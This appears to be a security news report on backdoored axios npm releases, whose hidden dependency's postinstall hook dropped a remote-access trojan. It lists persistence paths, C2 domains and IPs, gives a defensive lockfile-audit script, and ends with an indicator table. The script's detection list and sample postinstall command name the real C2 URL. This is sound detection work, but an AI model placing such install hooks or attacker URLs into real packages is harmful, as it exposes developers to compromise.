Axios npm Backdoored: UNC1069 Deploys Cross-Platform RAT via Supply Chain Attack

2026-04-01 Cybersec Sentinel

https://cybersecsentinel.com/axios-npm-backdoored-unc1069-deploys-cross-platform-rat-via-supply-chain-attack/


Malicious Axios npm releases 1.14.1 and 0.30.4, allegedly published from a compromised maintainer account, added the hidden [email protected] dependency, whose postinstall script ran a dropper during npm install. The excerpt attributes the operation to UNC1069, described as a financially motivated North Korea-nexus actor linked to BlueNoroff, and identifies SILKBELL as the dropper and WAVESHAPER.V2 as the cross-platform RAT. The infection chain delivered macOS, Windows, and Linux payloads from sfrclak[.]com:8000, with Windows persistence through %PROGRAMDATA%\system.bat and a Registry Run key, ad-hoc code signing on macOS, and deployment to /tmp/ld.py on Linux. The RAT supported command execution, additional payload deployment, filesystem reconnaissance, C2 beaconing every 60 seconds, and cleanup steps that removed evidence of the postinstall chain. Infrastructure and account indicators included sfrclak[.]com, callnrwise[.]com, 142.11.206[.]73, ifstap[@]proton[.]me, and nrwise[@]proton[.]me.
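To turn the chain above into a local check, the following added example (not code from the article or from the axios project) audits a package-lock.json for the two backdoored axios releases, for transitive packages that carry install hooks, and for packages resolved outside the public registry, then scans an installed package.json, where the hook command actually lives, for the reported indicators. The lockfile and package.json objects are constructed for illustration, and "hidden-dep" is a placeholder for the dependency name the page does not give.

```javascript
// Added example (not the article's or axios's code): audit package-lock.json
// ("packages" map, lockfileVersion 2/3) for the backdoored axios releases, for
// transitive packages with install hooks, and for off-registry downloads; then
// scan an installed package.json, where the hook text actually lives.
const BACKDOORED_AXIOS = new Set(["1.14.1", "0.30.4"]);
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Indicators quoted in the article, in plain (non-defanged) form for matching.
const IOC_STRINGS = ["sfrclak.com", "callnrwise.com", "142.11.206.73", "/tmp/ld.py", "system.bat"];
const REGISTRY_HOST = "registry.npmjs.org";

// "node_modules/a/node_modules/@s/b" -> "@s/b"
function packageName(lockPath) {
  const i = lockPath.lastIndexOf("node_modules/");
  return i === -1 ? lockPath : lockPath.slice(i + "node_modules/".length);
}

function auditLockfile(lock) {
  const findings = [];
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    if (lockPath === "") continue; // the root project itself
    const name = packageName(lockPath);
    if (name === "axios" && BACKDOORED_AXIOS.has(entry.version)) {
      findings.push({ name, reason: `backdoored axios release ${entry.version}` });
    }
    if (entry.hasInstallScript) findings.push({ name, reason: "runs an install hook" });
    const host = entry.resolved ? new URL(entry.resolved).hostname : REGISTRY_HOST;
    if (host !== REGISTRY_HOST) findings.push({ name, reason: `resolved from ${host}` });
  }
  return findings;
}

// The lockfile only records that a hook exists (hasInstallScript); the command
// itself is in node_modules/<pkg>/package.json, so check it for the indicators.
function auditInstallHooks(pkgJson) {
  const hits = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkgJson.scripts || {})[hook];
    const matched = cmd ? IOC_STRINGS.filter((s) => cmd.includes(s)) : [];
    if (matched.length) hits.push({ hook, matched });
  }
  return hits;
}

// Constructed sample data; "hidden-dep" is a placeholder for the name the article omits.
const sampleLock = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", dependencies: { axios: "^1.14.0" } },
  "node_modules/axios": { version: "1.14.1", dependencies: { "hidden-dep": "1.0.0" }, resolved: "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz" },
  "node_modules/hidden-dep": { version: "1.0.0", hasInstallScript: true, resolved: "https://registry.npmjs.org/hidden-dep/-/hidden-dep-1.0.0.tgz" },
} };
const sampleHookPkg = { name: "hidden-dep", scripts: { postinstall: "node setup.js http://sfrclak.com:8000/6202033" } };
```

Running auditLockfile(sampleLock) reports the backdoored axios version and the install hook on the hidden dependency; auditInstallHooks(sampleHookPkg) then pins the postinstall command to the sfrclak.com indicator.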

Indicators of Compromise

| Type | Value | First Seen | Last Seen |
|------|-------|------------|-----------|
| DOMAIN | sfrclak.com | 2026-03-30 | 2026-04-20 |
| HASH | e10b1fa84f1d6481625f741b6989278… | 2026-03-31 | 2026-04-17 |
| DOMAIN | callnrwise.com | 2026-03-31 | 2026-04-17 |
| URL | http://sfrclak.com:8000/6202033 | 2026-03-30 | 2026-04-17 |
| IPv4 | 142.11.206.73 | 2026-03-30 | 2026-04-17 |
| HASH | d6f3f62fd3b9f5432f5782b62d8cfd5… | 2026-03-30 | 2026-04-04 |
| HASH | 07d889e2dadce6f3910dcbc253317d2… | 2026-03-30 | 2026-04-04 |
| HASH | 2553649f2322049666871cea80a5d0d… | 2026-03-30 | 2026-04-04 |
